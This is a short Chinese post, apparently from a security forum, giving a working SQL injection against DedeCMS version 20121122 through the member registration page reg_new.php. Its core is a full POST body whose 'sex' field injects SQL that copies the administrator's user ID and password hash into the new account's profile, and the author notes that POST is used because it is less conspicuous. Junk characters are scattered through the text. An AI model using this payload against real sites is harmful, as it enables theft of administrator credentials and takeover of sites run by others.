dedecms版本 20121122
; e l' v. k4 o3 W5 a; x0 K
3 d* s1 j3 Z$ R需要magic_quotes_gpc=Off, W8 O1 a# B7 E& ^" O
. `- K% J7 l b8 _( _5 X应该是没有什么大危害的漏洞.: e* f- D, C+ _8 d+ f; E* f. y
原来发过一个Dedecms注射漏洞,貌似并没有修补,重新利用了一下,可以获得管理员密码.6 F( n( O/ s5 b& b8 a% O
4 \4 n6 l) T: \3 l# T
是一个漏洞.其实不仅仅是审核机制绕过,也可以获得管理员密码的.# c" i# ^$ y k; H
POST提交以下数据,其实不用POST提交的,这样隐蔽点.4 z# |# Q3 X# k4 N$ R7 w
, T, N6 J" f; |
http:///de/member/reg_new.php2 b6 ^4 K" T8 {) X9 A0 t0 \
. z) o. _+ o$ C) E1 {POST1 \( ~+ X7 b+ S+ F0 C+ Z( [! C! z
3 D) O2 w8 ]% Z7 u1 P9 a
dopost=regbase&step=1&mtype=%E4%B8%AA%E4%BA%BA&mtype=%E4%B8%AA%E4%BA%BA&userid=c4rp3nt3r&uname=c4rp3nt3r&userpwd=ssssss&userpwdok=ssssss&email=sss%40ss.ss&safequestion=0&safeanswer=&sex=boy',100,100,'sss@xx.xx',1000,0,'www' and @`'`,(select concat(userid,0x3a,pwd) from `#@__admin` limit 1),0,'',1316751900,'',1316751900,'');%00&vdcode=glos&agree=
, N# L% ~+ w& B, Y; K
, a% \6 y! `9 A% C! Z; ]0 a) D& U6 l成功注册后,头像处里面有好玩的信息.
+ P6 h! ^, P( w: W* Q. L! n; [; I. f1 m5 ~! y, `
|